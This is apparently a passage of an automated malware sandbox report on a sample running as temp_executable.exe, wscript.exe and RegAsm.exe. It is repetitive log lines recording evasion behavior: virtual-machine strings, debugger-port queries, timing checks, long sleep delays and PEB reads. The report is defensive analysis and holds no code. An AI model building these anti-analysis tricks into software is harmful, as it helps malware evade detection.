          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 4B70000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6D1C0 rdtsc 10_2_02F6D1C0
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.7 %
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7228Thread sleep count: 158 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7228Thread sleep count: 317 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7204Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7172Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7284Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: wscript.exe, 00000000.00000003.1319553031.000002387C9BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
          Source: wscript.exe, 00000000.00000003.1319553031.000002387C9BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: wscript.exe, 00000000.00000003.1318518516.000002387ED74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: temp_executable.exe, 00000008.00000002.1314448331.0000000001002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6D1C0 rdtsc 10_2_02F6D1C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00417663 LdrLoadDll,10_2_00417663
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAF2F8 mov eax, dword ptr fs:[00000030h]10_2_02FAF2F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE92FF mov eax, dword ptr fs:[00000030h]10_2_02EE92FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F002E1 mov eax, dword ptr fs:[00000030h]10_2_02F002E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F002E1 mov eax, dword ptr fs:[00000030h]10_2_02F002E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F002E1 mov eax, dword ptr fs:[00000030h]10_2_02F002E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h]10_2_02FA12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC52E2 mov eax, dword ptr fs:[00000030h]10_2_02FC52E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1F2D0 mov eax, dword ptr fs:[00000030h]10_2_02F1F2D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1F2D0 mov eax, dword ptr fs:[00000030h]10_2_02F1F2D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF92C5 mov eax, dword ptr fs:[00000030h]10_2_02EF92C5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF92C5 mov eax, dword ptr fs:[00000030h]10_2_02EF92C5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFA2C3 mov eax, dword ptr fs:[00000030h]10_2_02EFA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFA2C3 mov eax, dword ptr fs:[00000030h]10_2_02EFA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFA2C3 mov eax, dword ptr fs:[00000030h]10_2_02EFA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFA2C3 mov eax, dword ptr fs:[00000030h]10_2_02EFA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFA2C3 mov eax, dword ptr fs:[00000030h]10_2_02EFA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h]10_2_02F1B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h]10_2_02F1B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h]10_2_02F1B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h]10_2_02F1B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h]10_2_02F1B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h]10_2_02F1B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h]10_2_02F1B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEB2D3 mov eax, dword ptr fs:[00000030h]10_2_02EEB2D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEB2D3 mov eax, dword ptr fs:[00000030h]10_2_02EEB2D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEB2D3 mov eax, dword ptr fs:[00000030h]10_2_02EEB2D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F792BC mov eax, dword ptr fs:[00000030h]10_2_02F792BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F792BC mov eax, dword ptr fs:[00000030h]10_2_02F792BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F792BC mov ecx, dword ptr fs:[00000030h]10_2_02F792BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F792BC mov ecx, dword ptr fs:[00000030h]10_2_02F792BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F002A0 mov eax, dword ptr fs:[00000030h]10_2_02F002A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F002A0 mov eax, dword ptr fs:[00000030h]10_2_02F002A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h]10_2_02F052A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h]10_2_02F052A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h]10_2_02F052A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h]10_2_02F052A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F872A0 mov eax, dword ptr fs:[00000030h]10_2_02F872A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F872A0 mov eax, dword ptr fs:[00000030h]10_2_02F872A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h]10_2_02F862A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F862A0 mov ecx, dword ptr fs:[00000030h]10_2_02F862A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h]10_2_02F862A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h]10_2_02F862A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h]10_2_02F862A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h]10_2_02F862A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h]10_2_02FB92A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h]10_2_02FB92A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h]10_2_02FB92A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h]10_2_02FB92A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2329E mov eax, dword ptr fs:[00000030h]10_2_02F2329E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2329E mov eax, dword ptr fs:[00000030h]10_2_02F2329E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F70283 mov eax, dword ptr fs:[00000030h]10_2_02F70283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F70283 mov eax, dword ptr fs:[00000030h]10_2_02F70283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F70283 mov eax, dword ptr fs:[00000030h]10_2_02F70283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2E284 mov eax, dword ptr fs:[00000030h]10_2_02F2E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2E284 mov eax, dword ptr fs:[00000030h]10_2_02F2E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC5283 mov eax, dword ptr fs:[00000030h]10_2_02FC5283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F31270 mov eax, dword ptr fs:[00000030h]10_2_02F31270
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F31270 mov eax, dword ptr fs:[00000030h]10_2_02F31270
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE826B mov eax, dword ptr fs:[00000030h]10_2_02EE826B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F19274 mov eax, dword ptr fs:[00000030h]10_2_02F19274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h]10_2_02FA0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF4260 mov eax, dword ptr fs:[00000030h]10_2_02EF4260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF4260 mov eax, dword ptr fs:[00000030h]10_2_02EF4260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF4260 mov eax, dword ptr fs:[00000030h]10_2_02EF4260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBD26B mov eax, dword ptr fs:[00000030h]10_2_02FBD26B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBD26B mov eax, dword ptr fs:[00000030h]10_2_02FBD26B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7D250 mov ecx, dword ptr fs:[00000030h]10_2_02F7D250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAB256 mov eax, dword ptr fs:[00000030h]10_2_02FAB256
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAB256 mov eax, dword ptr fs:[00000030h]10_2_02FAB256
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE9240 mov eax, dword ptr fs:[00000030h]10_2_02EE9240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE9240 mov eax, dword ptr fs:[00000030h]10_2_02EE9240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F78243 mov eax, dword ptr fs:[00000030h]10_2_02F78243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F78243 mov ecx, dword ptr fs:[00000030h]10_2_02F78243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF6259 mov eax, dword ptr fs:[00000030h]10_2_02EF6259
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEA250 mov eax, dword ptr fs:[00000030h]10_2_02EEA250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2724D mov eax, dword ptr fs:[00000030h]10_2_02F2724D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE823B mov eax, dword ptr fs:[00000030h]10_2_02EE823B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC5227 mov eax, dword ptr fs:[00000030h]10_2_02FC5227
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F27208 mov eax, dword ptr fs:[00000030h]10_2_02F27208
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F27208 mov eax, dword ptr fs:[00000030h]10_2_02F27208
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC53FC mov eax, dword ptr fs:[00000030h]10_2_02FC53FC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0E3F0 mov eax, dword ptr fs:[00000030h]10_2_02F0E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0E3F0 mov eax, dword ptr fs:[00000030h]10_2_02F0E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0E3F0 mov eax, dword ptr fs:[00000030h]10_2_02F0E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F263FF mov eax, dword ptr fs:[00000030h]10_2_02F263FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h]10_2_02F003E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h]10_2_02F003E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h]10_2_02F003E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h]10_2_02F003E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h]10_2_02F003E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h]10_2_02F003E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h]10_2_02F003E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h]10_2_02F003E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAF3E6 mov eax, dword ptr fs:[00000030h]10_2_02FAF3E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAB3D0 mov ecx, dword ptr fs:[00000030h]10_2_02FAB3D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h]10_2_02EFA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h]10_2_02EFA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h]10_2_02EFA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h]10_2_02EFA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h]10_2_02EFA3C0
